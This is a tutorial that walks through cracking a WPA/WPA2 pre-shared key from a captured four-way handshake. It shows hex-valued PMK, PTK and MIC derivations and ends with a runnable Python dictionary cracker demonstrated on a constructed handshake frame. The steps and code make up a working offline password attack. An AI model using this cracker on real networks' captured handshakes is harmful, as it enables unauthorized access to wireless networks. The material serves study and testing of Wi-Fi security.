The Crack

First, the assumed and known values:

  • SSID: linksys54gh
  • SSID Length: 11
  • Test password from a dictionary file or STDIN (radiustest)
  • The four-way handshake is captured and stored in eapcap2.cap. (Refer to Figure 1.)
  1. Verification of capture. This part of the program verifies that all the required packets are in the capture file. It filters out every frame that does not carry EtherType 0x888E (802.1X / EAPoL), then checks that the remaining EAPoL-Key frames form a complete four-way handshake.
  2. The packets are parsed for all relevant information. The following list gives the parts used during the cracking process; the figures are taken from the earlier Ethereal capture images.
    • Packet 1 (A>S): Not used by the cracking process. The ANonce it carries is read from packet 3 instead, where the Authenticator repeats it.
    • Packet 2 (S>A): Provides the SNonce value (green) shown in Figure 5.
      [Figure 5: Packet 2 with SNonce value highlighted.]

    • Packet 3 (A>S): Provides the ANonce value (green) and the MAC addresses of both the Authenticator (blue) and Supplicant (red). The MAC addresses could be taken from any one of these packets (see Figure 6).
      [Figure 6: Packet 3 with ANonce value and MAC addresses highlighted.]

    • Packet 4 (S>A): Provides the captured MIC value and the EAPoL-Key frame over which the test MIC is recomputed with the MIC Key taken from the generated PTK (see Figure 7). The Supplicant computes the MIC over the frame with the 16-byte MIC field filled with 00 bytes and only then writes the result into that field, so the cracker must zero the field again before recomputing.
      [Figure 7: Packet 4 with EAP frame data and MIC value highlighted.]


  3. The selected test password is checked to be sure that it's not less than eight or greater than 63 characters, the passphrase length range required by 802.11i.
  4. The PMK (256 bits) is generated from the test password, using the following algorithm:
    PMK  = PBKDF2_SHA1(passphrase, SSID, SSID length, 4096 iterations, 256 bits)
    PMK  = pbkdf2_sha1("radiustest","linksys54gh",11,4096)
  5. The PTK is generated from the PMK, using the following algorithm:
    PTK =  PRF-X(PMK,
        Len(PMK), "Pairwise key expansion",
        Min(AA,SA) || Max(AA,SA) || Min(ANonce,SNonce) || Max(ANonce,SNonce))
    
    PTK =  SHA1_PRF(
        9e99 88bd e2cb a743 95c0 289f fda0 7bc4   ;PMK
        1ffa 889a 3309 237a 2240 c934 bcdc 7ddb
        ,32,"Pairwise key expansion",        ;length of PMK & string
        000c 41d2 94fb 000d 3a26 10fb 893e e551   ;MAC and nonce values
        2145 57ff f3c0 76ac 9779 15a2 0607 2703
        8e9b ea9b 6619 a5ba b40f 89c1 dabd c104
        d457 411a ee33 8c00 fa8a 1f32 abfc 6cfb
        7943 60ad ce3a fb5d 159a 51f6,76)
    
    PTK =  ccbf 97a8 2b5c 51a4 4325 a77e 9bc5 7050
        daec 5438 430f 00eb 893d 84d8 b4b4 b5e8
        19f4 dce0 cc5f 2166 e94f db3e af68 eb76
        80f4 e264 6e6d 9e36 260d 89ff bf24 ee7e
  6. A MIC value is calculated, using the MIC Key (the first 16 bytes of the PTK, also called the KCK) and the EAPoL message. HMAC-MD5 is the algorithm for key descriptor version 1 (WPA/TKIP), which is the case here; a WPA2/CCMP handshake (key descriptor version 2) uses HMAC-SHA1 truncated to 128 bits instead:
    MIC =  HMAC_MD5(MIC Key,
        16,
        802.1x data)
    
    MIC =  HMAC_MD5(
        ccbf 97a8 2b5c 51a4 4325 a77e 9bc5 7050   ;MIC Key = first 16 bytes of PTK
        ,16,                     ;length of MIC Key
        0103 005f fe01 0900 0000 0000 0000 0000   ;802.1x data
        1400 0000 0000 0000 0000 0000 0000 0000
        0000 0000 0000 0000 0000 0000 0000 0000
        0000 0000 0000 0000 0000 0000 0000 0000
        0000 0000 0000 0000 0000 0000 0000 0000
        0000 0000 0000 0000 0000 0000 0000 0000
        0000 )
    MIC =  d0ca 4f2a 783c 4345 b0c0 0a12 ecc1 5f77
  7. The calculated MIC is compared to the captured MIC. A match means the candidate passphrase is the one the network's PSK was derived from (strictly, "radiustest" is the passphrase; the PSK is the 32-byte PMK computed from it in step 4):
    Calculated MIC using EAP frame four with "radiustest" is
         d0ca 4f2a 783c 4345 b0c0 0a12 ecc1 5f77
    
    Capture MIC is
         d0ca 4f2a 783c 4345 b0c0 0a12 ecc1 5f77
    
    CALCULATED MICS MATCH!!! Congratulations, the PSK is "radiustest".
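The seven steps above, carried through as one runnable check. This is an added example written for this page, not the article's program: it uses the article's SSID, passphrase, MAC addresses and nonce values as inputs, but the packet-4 frame it verifies is constructed here (same layout as the article's: descriptor type 0xfe, key length 0, zeroed nonce/IV/RSC/ID, body length 0x5f) and signed with the true passphrase to simulate the capture. Which MAC belongs to the AP and which nonce is the ANonce are assumptions; the PRF sorts both pairs, so the result does not depend on them. It also handles the key-descriptor-version-2 (WPA2/CCMP) MIC, which the article does not cover.

```python
import hashlib
import hmac
import struct

# Added example, not code from the article. Function names, the constructed
# frame and the wordlist are assumptions made for this example.


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """Step 4: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, prefix: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-X: concatenate HMAC-SHA1(key, prefix || 0x00 || data || i) for i = 0, 1, ..."""
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, prefix + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def ptk_from_pmk(pmk, aa, spa, anonce, snonce, nbytes=64):
    """Step 5: PTK = PRF-512(PMK, "Pairwise key expansion", Min(AA,SPA)||Max(AA,SPA)||Min(N)||Max(N)).
    The 6+6+32+32 = 76-byte data block is the one the article feeds to SHA1_PRF. CCMP only
    needs PRF-384 (48 bytes), but the MIC Key (KCK) is the first 16 bytes either way."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, nbytes)


MIC_OFFSET = 81  # EAPOL header (4) + descriptor fields up to the 16-byte MIC (77)


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Step 6: MIC over the EAPOL-Key frame with its MIC field zeroed. Key Information bits
    0-2 pick the algorithm: 1 = HMAC-MD5 (WPA/TKIP, the article's case), 2 = HMAC-SHA1-128."""
    version = struct.unpack(">H", frame[5:7])[0] & 0x0007
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if version == 2:
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    raise ValueError(f"unsupported key descriptor version {version}")


def check_passphrase(passphrase, ssid, aa, spa, anonce, snonce, frame) -> bool:
    """Steps 3-7 for one candidate: PMK -> PTK -> MIC Key, recompute the MIC, compare."""
    if not 8 <= len(passphrase) <= 63:  # step 3: 802.11i passphrase length rule
        return False
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    return hmac.compare_digest(eapol_mic(kck, frame), frame[MIC_OFFSET:MIC_OFFSET + 16])


def crack(wordlist, ssid, aa, spa, anonce, snonce, frame):
    """Return the first candidate whose MIC matches the captured one, or None."""
    for candidate in wordlist:
        if check_passphrase(candidate, ssid, aa, spa, anonce, snonce, frame):
            return candidate
    return None


# --- constructed capture -------------------------------------------------------------
def build_eapol_key_frame(key_info: int, replay_counter: int, key_data: bytes = b"") -> bytes:
    """Constructed EAPOL-Key frame laid out like the article's packet 4: descriptor 0xfe,
    key length 0, zero nonce/IV/RSC/ID, zero MIC; body length is 0x5f with empty key data."""
    body = (b"\xfe" + struct.pack(">HH", key_info, 0) + struct.pack(">Q", replay_counter)
            + b"\x00" * 32 + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8
            + b"\x00" * 16 + struct.pack(">H", len(key_data)) + key_data)
    return b"\x01\x03" + struct.pack(">H", len(body)) + body


def sign_frame(frame: bytes, kck: bytes) -> bytes:
    """Fill in the MIC the Supplicant would send (simulates the captured packet 4)."""
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


# Inputs taken from the article. AP/supplicant and ANonce/SNonce assignment is assumed.
SSID = "linksys54gh"
AA = bytes.fromhex("000c41d294fb")
SPA = bytes.fromhex("000d3a2610fb")
ANONCE = bytes.fromhex("893ee551214557fff3c076ac977915a2060727038e9bea9b6619a5bab40f89c1")
SNONCE = bytes.fromhex("dabdc104d457411aee338c00fa8a1f32abfc6cfb794360adce3afb5d159a51f6")


def demo(key_info: int = 0x0109):
    """Sign a constructed packet 4 with the true passphrase, then crack it from a wordlist."""
    true_kck = ptk_from_pmk(pmk_from_passphrase("radiustest", SSID), AA, SPA, ANONCE, SNONCE)[:16]
    captured = sign_frame(build_eapol_key_frame(key_info, replay_counter=1), true_kck)
    wordlist = ["short", "password", "linksys54gh", "radiustest"]  # constructed
    return crack(wordlist, SSID, AA, SPA, ANONCE, SNONCE, captured)


if __name__ == "__main__":
    print("PMK:", pmk_from_passphrase("radiustest", SSID).hex())
    print("recovered passphrase:", demo())
```

Passing `0x010a` as `key_info` exercises the WPA2/CCMP branch (version 2), which changes only the MIC algorithm; the PBKDF2 and PRF stages are identical, which is why the same dictionary attack applies to both.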